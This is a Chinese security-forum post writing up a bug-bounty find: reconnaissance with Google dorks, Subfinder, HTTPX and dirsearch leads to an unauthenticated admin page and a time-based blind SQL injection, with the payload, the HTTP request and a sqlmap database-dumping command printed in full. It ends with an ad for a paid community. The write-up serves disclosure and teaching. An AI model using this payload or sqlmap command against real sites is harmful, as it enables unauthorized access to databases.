安全矩阵

 找回密码
 立即注册
搜索
查看: 1000|回复: 0

总计1500美刀的未授权和sql注入漏洞

[复制链接]

179

主题

179

帖子

630

积分

高级会员

Rank: 4

积分
630
发表于 2023-10-22 15:44:03 | 显示全部楼层 |阅读模式
总计1500美刀的未授权和sql注入漏洞
正文

针对某目标,使用了一下谷歌语法,以及github上面相关资源

  1. inurl:/bug bounty
  2. inurl:/security
  3. inurl:security.txt
  4. inurl:security "reward"
  5. Bug Bounty program "reward"
  6. inurl:/responsible disclosure
  7. inurl:/responsible-disclosure/ reward
  8. inurl:/responsible-disclosure/ swag
  9. inurl:/responsible-disclosure/ bounty
  10. responsible disclosure "reward" site:com
  11. responsible disclosure hall of fame
  12. "powered by bugcrowd" -site:bugcrowd.com
  13. "submit vulnerability report"
  14. "submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone"
复制代码



过滤出几周或几个月前发布的。

首先使用Subfinder和HTTPX进行了子域搜索,以查看子域名的状态码,如下所示:


发现了一个子域名xeon4.redacted.com,其响应为200,但是页面没啥东西

继续使用Waybackurl搜索接口,没发现,继续用Dirsearch来搜索,发现了adminpage接口

  1. xeon4.redacted.com/adminpage
复制代码





这个页面有一些敏感信息,而凭借它们是可以进入到其他敏感页面的,这里就造成了敏感信息泄露

从上图中同时还发现了另外一个链接;

打开了上面的链接,页面显示了一个表单,可以在其中搜索文档,如下所示:


做文档搜索时截获了一个请求,directform参数容易受到SQL注入攻击,通过测试负载发现了一个基于时间的SQL盲注。

payload如下:

  1. 'XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR'Z
复制代码



请求如下:

  1. POST /xxxx/repository/xxxx? HTTP/2
  2. Host: secure.redacted.com
  3. Cookie: cookie
  4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  6. Accept-Language: en-US,en;q=0.5
  7. Accept-Encoding: gzip, deflate
  8. Content-Type: application/x-www-form-urlencoded
  9. Content-Length: 77
  10. Origin: https://secure.redacted.com
  11. Referer: https://secure.redacted.com/xxxx/repository/xxxxx?
  12. [...]

  13. password=xxxxxx&directform=脆弱点
复制代码


响应:

  1. Sleep time 15s ‘XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR’Z
复制代码




  1. Sleep time 20s ‘XOR(if(now()=sysdate()%2Csleep(20)%2C0))XOR’Z
复制代码





这很容易受到SQLI的攻击,下面使用Sqlmap,并使用以下简单命令保存上述请求

  1. sqlmap -r request.txt -p directform — random-agent — level 5 — risk 3 — dbs — threads=10
复制代码




这个sqli价值500美刀,上面那个未授权价值1000美刀

如果你是一个长期主义者,欢迎加入我的知识星球(优先查看这个链接,里面可能还有优惠券),我们一起往前走,每日都会更新,精细化运营,微信识别二维码付费即可加入,如不满意,72 小时内可在 App 内无条件自助退款


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-27 22:29 , Processed in 0.013868 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表